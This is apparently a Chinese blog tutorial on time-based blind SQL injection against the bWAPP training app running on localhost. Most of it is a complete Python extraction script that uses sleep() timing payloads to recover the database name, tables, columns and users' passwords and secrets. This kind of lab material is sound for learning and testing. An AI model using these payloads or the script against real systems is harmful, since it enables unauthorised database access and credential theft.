基于时间盲注

使用docker启动环境、登录、并跳转到时间盲注的页面:


choosetarget.png

打开HackBar Quantum插件、开发者工具,使用简单的方式来进行测试,查看是否可以进行时间盲注:


test.png

从页面可以看到,搜索电影,应该是按照电影名进行搜索,应该是一个字符串而不是数字,因为知道电影列表中有World War Z相关的电影,把这个当作一个参数:
character.png

通过输入的字符串进行请求,可以看到请求的时间明显要比其他的要长,可以得出结论为存在漏洞,可以进行注入。

获取数据库名字

常用的函数:

substr(a,b,c):从b位置开始,截取字符串a的c长度
count():计算总数
ascii():返回字符的ASCII码
length():返回字符串的长度
left(a,b):从左往右截取字符串a的前b个字符
sleep(n):将程序挂起n秒
image.png

从返回的时间来看,length(database()) > 4 的结果为true,说明数据库名字的长度要大于4,手动测试几个数,就可以得到数据库的长度:


image.png

为了获取数据库名字的长度,可以使用脚本来解决,因为mysql数据库的长度限制为64,从1遍历到64个,代码如下:

def get_database_length():
    num = 0
    for i in range(1, 64):
        url = "http://localhost:12345/sqli_15.php?title=World War Z' and length(database())=%d and sleep(3) -- " \
              "&action=search" % i
        start_time = time.time()
        resp = session.get(url)
        end_time = time.time()
        ga = end_time - start_time
        # 因为上面的SQL,and length(database())=%d and sleep(3),如果length(database())=%d 返回的结果为false,
        # 整个SQL就会返回false,就可以瞬间返回,如果length(database())=%d 返回的结果为True,sleep(3)就会执行,
        # 整个sql执行的时间就会大于1s,在找到数据库的长度之后,就直接跳出循环。
        if ga > 1:
            print("length of database name is %d" % i)
            num = i
            break
    return num

在获取数据库长度之后,要找出数据库的名字,因为数据库名字的规范:采用26个英文字母(区分大小写)和0-9的自然数(一般经常不需要加)加上下划线组成,命名简洁明确,多个单词用下划线分隔,一个项目一个数据库,为了方便比较,将字符变成数字,脚本如下:

def get_database_name(num):
    # 因为返回的数据为字节,要把自己拼到一块
    data = list()
    for i in range(1, num + 1):
        for j in range(33, 128):
            url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d and " \
                  "sleep(3) -- &action=search" % (i, j)
            start_time = time.time()
            rsp = session.get(url)
            end_time = time.time()
            ga = end_time - start_time
            if ga > 1:
                data.append(chr(j))
                break
    return "".join(data)

返回的数据为:bWAPP。
通过获取到的数据库,然后查找数据库中的数据表,数据表的的字段已经数据,代码是基于python3,代码如下:

# coding=utf-8
# !/usr/bin/python
# 基于时间的SQL盲注

import requests
import time

# ip地址需要根据实际情况进行修改
data = {
    "login": "bee",
    "password": "bug",
    "security_level": "0",
    "form": "submit"
}
ip_address = "http://localhost:12345/login.php"
# 获取全局session
session = requests.session()
resp = session.post(ip_address, data)


# 获取数据库名字的长度
def get_database_length():
    num = 0
    for i in range(1, 64):
        url = "http://localhost:12345/sqli_15.php?title=World War Z' and length(database())=%d and sleep(3) -- " \
              "&action=search" % i
        start_time = time.time()
        resp = session.get(url)
        end_time = time.time()
        ga = end_time - start_time
        # 因为上面的SQL,and length(database())=%d and sleep(3),如果length(database())=%d 返回的结果为false,
        # 整个SQL就会返回false,就可以瞬间返回,如果length(database())=%d 返回的结果为True,sleep(3)就会执行,
        # 整个sql执行的时间就会大于1s,在找到数据库的长度之后,就直接跳出循环。
        if ga > 1:
            num = i
            break
    return num


# 获取数据库的名字
def get_database_name(num):
    # 因为返回的数据为字节,要把自己拼到一块
    database_char = list()
    for i in range(1, num + 1):
        for j in range(33, 128):
            url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d and " \
                  "sleep(3) -- &action=search" % (i, j)
            start_time = time.time()
            rsp = session.get(url)
            end_time = time.time()
            ga = end_time - start_time
            if ga > 1:
                database_char.append(chr(j))
                break
    database_name = "".join(database_char)
    print("===database name===")
    print(database_name)
    get_table_name_num(database_name)


# 获取指定数据库下数据表的信息
# 1.获取数据表的名字长度
# 2.获取数据库表的名字
def get_table_name_num(database_name):
    table_name_list = list()
    for i in range(0, 6):
        num = 0
        for j in range(1, 64):
            url = "http://localhost:12345/sqli_15.php?title=World War Z' and length((select table_name from " \
                  "information_schema.tables where table_schema='%s' limit %d,1))=%d and sleep(3) -- " \
                  "&action=search" % (database_name, i, j)
            start_time = time.time()
            resp = session.get(url)
            end_time = time.time()
            ga = end_time - start_time
            # 因为上面的SQL,and length(database())=%d and sleep(3),如果length(database())=%d 返回的结果为false,
            # 整个SQL就会返回false,就可以瞬间返回,如果length(database())=%d 返回的结果为True,sleep(3)就会执行,
            # 整个sql执行的时间就会大于1s,在找到数据库的长度之后,就直接跳出循环。
            if ga > 1:
                num = j
                break
        table = get_table_name(i, num, database_name)
        if len(table) > 0:
            table_name_list.append(table)
    print("===tables name===")
    print(table_name_list)
    for item in table_name_list:
        get_table_column(item)


def get_table_name(k, num, database_name):
    # 因为返回的数据为字节,要把自己拼到一块
    data_char = list()
    for i in range(1, num + 1):
        for j in range(33, 128):
            url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr((select table_name from " \
                  "information_schema.tables where table_schema='%s' limit %d,1),%d,1))=%d and sleep(3) -- " \
                  "&action=search" % (database_name, k, i, j)
            start_time = time.time()
            rsp = session.get(url)
            end_time = time.time()
            ga = end_time - start_time
            if ga > 1:
                data_char.append(chr(j))
                break
    table_name = "".join(data_char)
    return table_name


def get_table_column(table_name):
    column_name_list = list()
    for i in range(0, 20):
        num = 0
        for j in range(1, 64):
            url = "http://localhost:12345/sqli_15.php?title=World War Z' and length((select column_name from " \
                  "information_schema.columns where table_name='%s' limit %d,1))=%d and sleep(3) -- " \
                  "&action=search" % (table_name, i, j)
            start_time = time.time()
            resp = session.get(url)
            end_time = time.time()
            ga = end_time - start_time
            # 因为上面的SQL,and length(database())=%d and sleep(3),如果length(database())=%d 返回的结果为false,
            # 整个SQL就会返回false,就可以瞬间返回,如果length(database())=%d 返回的结果为True,sleep(3)就会执行,
            # 整个sql执行的时间就会大于1s,在找到数据库的长度之后,就直接跳出循环。
            if ga > 1:
                num = j
                break
        column = get_table_column_name(i, num, table_name)
        if len(column) > 0:
            column_name_list.append(column)
    print("===%s  columns ===" % table_name)
    print(column_name_list)


def get_table_column_name(k, num, column_name):
    # 因为返回的数据为字节,要把自己拼到一块
    data_char = list()
    for i in range(1, num + 1):
        for j in range(33, 128):
            url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr((select column_name from " \
                  "information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d and sleep(3) -- " \
                  "&action=search" % (column_name, k, i, j)
            start_time = time.time()
            rsp = session.get(url)
            end_time = time.time()
            ga = end_time - start_time
            if ga > 1:
                data_char.append(chr(j))
                break
    column_name = "".join(data_char)
    return column_name


def get_column_length(table_name, item, index):
    num = 0
    for i in range(1, 64):
        url = "http://localhost:12345/sqli_15.php?title=World War Z' and length((select %s from %s limit %d," \
              "1))=%d and sleep(3) -- &action=search" % (item, table_name, index, i)
        start_time = time.time()
        resp = session.get(url)
        end_time = time.time()
        ga = end_time - start_time
        if ga > 1:
            num = i
            break
    data = get_column_data(table_name, item, index, num)
    print(item)
    print(data)


def get_column_data(table_name, item, index, num):
    # 因为返回的数据为字节,要把自己拼到一块
    data_char = list()
    for i in range(1, num + 1):
        for j in range(33, 128):
            url = "http://localhost:12345/sqli_15.php?title=World War Z' and ascii(substr((select %s from %s limit " \
                  "%d,1),%d,1))=%d and sleep(3) -- &action=search" % (item, table_name, index, i, j)
            start_time = time.time()
            rsp = session.get(url)
            end_time = time.time()
            ga = end_time - start_time
            if ga > 1:
                data_char.append(chr(j))
                break
    data = "".join(data_char)
    return data


if __name__ == '__main__':
    #  获取数据库、数据表、数据表的字段
    # get_database_name(get_database_length())
    # 获取数据表的数据
    table_name = 'users'
    column_names = ['login', 'password', 'email', 'secret', 'activation_code', 'activated', 'reset_code', 'admin']
    for index in range(1, 10):
        for item in column_names:
            get_column_length(table_name, item, index)

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 199,711评论 5 468
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 83,932评论 2 376
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 146,770评论 0 330
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,799评论 1 271
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,697评论 5 359
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,069评论 1 276
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,535评论 3 390
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,200评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,353评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,290评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,331评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,020评论 3 315
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,610评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,694评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,927评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,330评论 2 346
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 41,904评论 2 341

推荐阅读更多精彩内容